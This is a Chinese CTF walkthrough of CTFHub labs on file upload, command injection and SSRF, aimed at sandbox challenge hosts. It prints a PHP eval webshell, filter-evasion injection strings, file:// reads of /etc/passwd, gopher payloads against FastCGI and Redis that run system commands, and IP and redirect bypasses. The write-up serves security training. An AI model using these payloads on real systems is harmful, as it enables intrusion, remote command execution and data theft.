文章目录
5.文件上传
无验证
直接上传一句话木马<?php @eval($_POST['pass']);?>
打开蚁剑,输入密码连接,注意URL地址是一句话木马的路径
即可得到flag
前端验证
上传.php文件,发现不允许上传,因为是js前端检验,可直接抓包绕过再改回后缀名即可
上传2.jpg,再抓包改回2.php,发现上传成功
MIME绕过
抓包,将Content-Type类型改为jpg,png或gif的格式即可
这里我用jpg格式发现上传失败了,改用gif格式上传成功的,应该改为jpeg
.htaccess
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
由于之前写过类似的了,这里直接用,先上传.htaccess,上传成功
接下来上传xxx.jpg,发现并未以jpg格式解析,而是php格式解析的,接下来一句话即可
双写后缀
上传php发现上传成功,但php后缀被删除了,依照题目应该要双写后缀
上传2.pphphp成功变为2.php,即可执行一句话获得flag
6.RCE
命令注入
首先ls查看有哪些文件www.baidu.com ; ls
发现有216872332227313.php,cat一下www.baidu.com ; cat 216872332227313.php,然后在源代码发现flag
过滤cat
127.0.0.1 ; ls先查看文件,发现了flag_169413020618490.php
发现cat被过滤了,那么我们就要构造cat,在linux下可尝试构造
127.0.0.1 ; a=ca;b=t;$a$b flag_169413020618490.php,在源码得到flag
过滤空格
先进行过滤空格总结,在linux环境下进行试验
1:<> 2:< 3:${IFS}
由于${IFS}没有什么问题,用它来解题,同理先查看文件 127.0.0.1;ls
然后读取flag 127.0.0.1;cat${IFS}flag_23126758913777.php,源码得到flag
过滤目录分隔符
首先查看文件127.0.0.1 ; ls
发现有flag_is_here,我们要进入目录下拿flag,127.0.0.1 ; cd flag_is_here ; ls
然后将ls改为cat flag即可127.0.0.1 ; cd flag_is_here ; cat flag_1918363312881.php,源码得到flag
过滤运算符
和前面的题一样,思路一模一样。。。。这里没有过滤 ;差评。127.0.0.1 ; ls
127.0.0.1 ; cat flag_225062507519043.php
综合过滤练习
这就真的全过滤了,这里就要用到另外两种命令分隔符了%0a(换行符) 、%0d(回车符),并且在url下写入:
?ip=127.0.0.1%0als#
接下来查看flag_is_here文件夹,我这里使用Hex编码查看,
?ip=127.0.0.1%0als${IFS}$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65")#
得到了flag的文件名,接下来就是读取了,由于过滤了cat,可以用ca''t或ca""t来绕过,并且对下面进行16进制编码
ip=127.0.0.1%0aca''t${IFS}$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x36\x33\x31\x38\x31\x35\x30\x35\x33\x33\x34\x2e\x70\x68\x70")#
总之技巧很多,可以参考文章:关于命令执行以及常见的一些绕过过滤的方法
7.SSRF
ctfhub终于出新题了,泪目,从0开始的ssrf学习之旅
内网访问
提示:尝试访问位于127.0.0.1的flag.php吧
直接访问?url=127.0.0.1/flag.php
伪协议读取文件
[WEB安全]SSRF中URL的伪协议
SSRF在有无回显方面的利用及其思考与总结
提示:尝试去读取一下Web目录下的flag.php吧
URL伪协议:
file:// 本地文件传输协议,File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样
dict:// Dict协议,字典服务器器协议,dict是基于查询响应的TCP协议,它的目标是超越Webster protocol,并允许客户端在使用过程中访问更多字典。Dict服务器和客户机使用TCP端口2628
gopher:// Gopher协议是互联网上使用的分布型的文件搜集获取网络协议。gopher协议是在HTTP协议出现之前,在internet上常见重用的协议,但是现在已经用的很少了
sftp:// Sftp代表SSH文件传输协议(SSH File Transfer Protocol),或安全文件传输协议(Secure File Transfer Protocol),这是一种与SSH打包在一起的单独协议,它运行在安全连接上,并以类似的方式进行工作
ldap:// LDAP代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议
tftp:// TFTP(Trivial File Transfer Protocol,简单文件传输协议)是一种简单的基于lockstep机制的文件传输协议,它允许客户端从远程主机获取文件或将文件上传至远程主机。
由于题目是伪协议读取文件,又是web目录下,使用绝对路径,直接上payload:?url=file:///var/www/html/flag.php
端口扫描
提示:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦
直接使用bp进行端口爆破
或者使用python脚本爆破
import requests
url='http://challenge-48d05bc5759898a5.sandbox.ctfhub.com:10080/?url=127.0.0.1:'
port=8000
while port<=9000:
Wholeurl=url+str(port)
r = requests.get(Wholeurl)
print(Wholeurl)
if(len(r.content)!=0):
print(port)
print(r.content)
break
port=port+1
print("over")
POST请求
提示:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦
看到提示,访问302.php试试,得到了源码
访问flag.php得到了一个key
使用file伪协议可以读取源码,得到:
<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
echo "Just View From 127.0.0.1";
return;
}
$flag=getenv("CTFHUB");
$key = md5($flag);
if(isset($_POST["key"]) && $_POST["key"] == $key){
echo $flag;
exit;
}
?>
<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>
看了wp回来,这题需要用gopher协议通过302.php的跳转去post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。
首先构造一个最基本的post请求:
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36 #特别注意此处的长度,长度不对也是不行的
key=2ddf50f048c2728241fc9c1a6a2d0eac #key需要去通过127.0.0.1访问flag.php获取,也就是flag的MD5值。
首先进行一次url编码,将换行%0A改成%0D%0A
POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D2ddf50f048c2728241fc9c1a6a2d0eac
然后再进行2次URL编码,也就是说一共要进行三次URL编码,最后为:
POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D2ddf50f048c2728241fc9c1a6a2d0eac
最后使用gopher协议请求即可
?url=127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D2ddf50f048c2728241fc9c1a6a2d0eac
上传文件
提示:这次需要上传一个文件到flag.php了.我准备了个302.php可能会有用.祝你好运
使用file伪协议读取到源码?url=file:///var/www/html/flag.php
<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
echo "Just View From 127.0.0.1";
return;
}
if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
echo getenv("CTFHUB");
exit;
}
?>
题目让我们通过127.0.0.1访问flag.php上传一个文件上去就会返回flag
在构造请求之前我们随便构造一个文件上传的代码,如下:
<!DOCTYPE html>
<html>
<head>
<title>test XXE</title>
<meta charset="utf-8">
</head>
<body>
<form action="http://127.0.0.1/flag.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="go" />
</form>
</body>
随便上传一个文件并进行抓包,得到了一个数据包
然后进行三次url编码,最后得到:(不知道为何我的url编码总是不成功,这是复制大佬的payload)
gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250d%25250aHost%25253A%25253127.0.0.1%25250d%25250aContent-Length%25253A%252520333%25250d%25250a%252543%252561%252563%252568%252565%25252d%252543%25256f%25256e%252574%252572%25256f%25256c%25253a%252520%25256d%252561%252578%25252d%252561%252567%252565%25253d%252530%25250d%25250a%252555%252570%252567%252572%252561%252564%252565%25252d%252549%25256e%252573%252565%252563%252575%252572%252565%25252d%252552%252565%252571%252575%252565%252573%252574%252573%25253a%252520%252531%25250d%25250a%25254f%252572%252569%252567%252569%25256e%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%25256d%252575%25256c%252574%252569%252570%252561%252572%252574%25252f%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%252562%25256f%252575%25256e%252564%252561%252572%252579%25253d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252555%252573%252565%252572%25252d%252541%252567%252565%25256e%252574%25253a%252520%25254d%25256f%25257a%252569%25256c%25256c%252561%25252f%252535%25252e%252530%252520%252528%252557%252569%25256e%252564%25256f%252577%252573%252520%25254e%252554%252520%252531%252530%25252e%252530%25253b%252520%252557%252569%25256e%252536%252534%25253b%252520%252578%252536%252534%252529%252520%252541%252570%252570%25256c%252565%252557%252565%252562%25254b%252569%252574%25252f%252535%252533%252537%25252e%252533%252536%252520%252528%25254b%252548%252554%25254d%25254c%25252c%252520%25256c%252569%25256b%252565%252520%252547%252565%252563%25256b%25256f%252529%252520%252543%252568%252572%25256f%25256d%252565%25252f%252538%252535%25252e%252530%25252e%252534%252531%252538%252533%25252e%252531%252530%252532%252520%252553%252561%252566%252561%252572%252569%25252f%252535%252533%252537%25252e%252533%252536%25250d%25250a%252541%252563%252563%252565%252570%252574%25253a%252520%252574%252565%252578%252574%25252f%252568%252574%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%252568%252574%25256d%25256c%25252b%252578%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%25256d%25256c%25253b%252571%25253d%252530%25252e%252539%25252c%252569%25256d%252561%252567%252565%25252f%252561%252576%252569%252566%25252c%252569%25256d%252561%252567%252565%25252f%252577%252565%252562%252570%25252c%252569%25256d%252561%252567%252565%25252f%252561%252570%25256e%252567%25252c%25252a%25252f%25252a%25253b%252571%25253d%252530%25252e%252538%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252573%252569%252567%25256e%252565%252564%25252d%252565%252578%252563%252568%252561%25256e%252567%252565%25253b%252576%25253d%252562%252533%25253b%252571%25253d%252530%25252e%252539%25250d%25250a%252552%252565%252566%252565%252572%252565%252572%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25252f%252575%252570%25256c%25256f%252561%252564%25255f%252573%252565%252572%25252e%252570%252568%252570%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%252545%25256e%252563%25256f%252564%252569%25256e%252567%25253a%252520%252567%25257a%252569%252570%25252c%252520%252564%252565%252566%25256c%252561%252574%252565%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%25254c%252561%25256e%252567%252575%252561%252567%252565%25253a%252520%25257a%252568%25252d%252543%25254e%25252c%25257a%252568%25253b%252571%25253d%252530%25252e%252539%25252c%252565%25256e%25253b%252571%25253d%252530%25252e%252538%25252c%252561%25256d%25253b%252571%25253d%252530%25252e%252537%25250d%25250a%252543%25256f%25256e%25256e%252565%252563%252574%252569%25256f%25256e%25253a%252520%252563%25256c%25256f%252573%252565%25250d%25250a%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252550%252548%252550%25255f%252553%252545%252553%252553%252549%25254f%25254e%25255f%252555%252550%25254c%25254f%252541%252544%25255f%252550%252552%25254f%252547%252552%252545%252553%252553%252522%25250d%25250a%25250d%25250a%252531%252532%252533%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252566%252569%25256c%252565%252522%25253b%252520%252566%252569%25256c%252565%25256e%252561%25256d%252565%25253d%252522%252531%252532%252533%25252e%252570%252568%252570%252522%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%25256f%252563%252574%252565%252574%25252d%252573%252574%252572%252565%252561%25256d%25250d%25250a%25250d%25250a%25253c%25253f%252570%252568%252570%252520%252570%252568%252570%252569%25256e%252566%25256f%252528%252529%25253b%25253f%25253e%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25252d%25252d%25250d%25250a
参考:CTFHUB技能树-SSRF【持续更新】
CTFHub-SSRF部分(持续更新)
FastCGI协议
提示:这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助
?url=file:///etc/passwd
首先验证存在ssrf,那么使用ssrf来攻击fpm,利用gopher协议攻击,使用神器Gopherus
python gopherus.py --exploit fastcgi
得到payload,进行url编码并传入,执行whoami
?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%20%2F%20fcgiclient%20%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH58%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%20%253D%20On%250Adisable_functions%20%253D%20%250Aauto_prepend_file%20%253D%20php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%253A%2504%2500%3C%253Fphp%20system('whoami')%253Bdie('-----Made-by-SpyD3r-----%250A')%253B%253F%3E%2500%2500%2500%2500
最后执行cat /flag,发现没有。。。。那么查看根目录ls /,得到flag名
?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH56%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%25008%2504%2500%253C%253Fphp%2520system%2528%2527ls%2520%2F%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
最后cat即可
?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH94%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%255E%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Fflag_91ae5ed6072b4bdaaeb5160534730cb3%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
参考文章:
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写
php-fpm(绕过open_basedir,结合ssrf)
Redis协议
提示:这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!
不多废话,直接上gopherus,得到payload,记得进行url编码
直接使用ssrf发现并未成功,看到返回头里有一个here is 302.php,懂了,用302来跳转
最后得到shell.php,但发现给的是GET传参的webshell
发现过滤了空格,使用${IFS}即可绕过
URL Bypass
url must start with “http://notfound.ctfhub.com”
题目说明url前面必须有http://notfound.ctfhub.com,即要绕过检测
当后端程序通过不正确的正则表达式(比如将http之后到com为止的字符内容,也就是http://notfound.ctfhub.com,认为是访问请求的host地址时)对上述URL的内容进行解析的时候,很有可能会认为访问URL的host为http://notfound.ctfhub.com,而实际上这个URL所请求的内容都是127.0.0.1上的内容。
payload:?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
数字IP Bypass
首先尝试访问127.0.0.1,发现被过滤了127,172和@
对于这种过滤我们可以采用改变IP的写法的方式进行绕过,例如127.0.0.1这个IP地址我们可以改写成:
- 8进制格式:0177.00.00.01
- 16进制格式:0x7f.0x0.0x0.0x1
- 10进制整数格式:2130706433
- 在linux下,0代表127.0.0.1,http://0进行请求127.0.0.1
302跳转 Bypass
直接访问?url=127.0.0.1/flag.php
这里依照题意写一下302跳转吧,这里一直在找短网址发现不行,所以还是在服务器上写上302.php
<?php
header("Location:http://127.0.0.1/flag.php");
?>
然后再访问我们的服务器上的302.php即可实现跳转
DNS重绑定 Bypass
直接访问?url=127.0.0.1/flag.php,就出flag了。。。
我们这里还是使用DNS重绑定,在网络上存在一个很神奇的服务,http://xip.io 当我们访问这个网站的子域名的时候,例如127.0.0.1.xip.io,就会自动重定向到127.0.0.1。
即:?url=127.0.0.1.xip.io/flag.php
参考:SSRF漏洞中绕过IP限制的几种方法总结
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
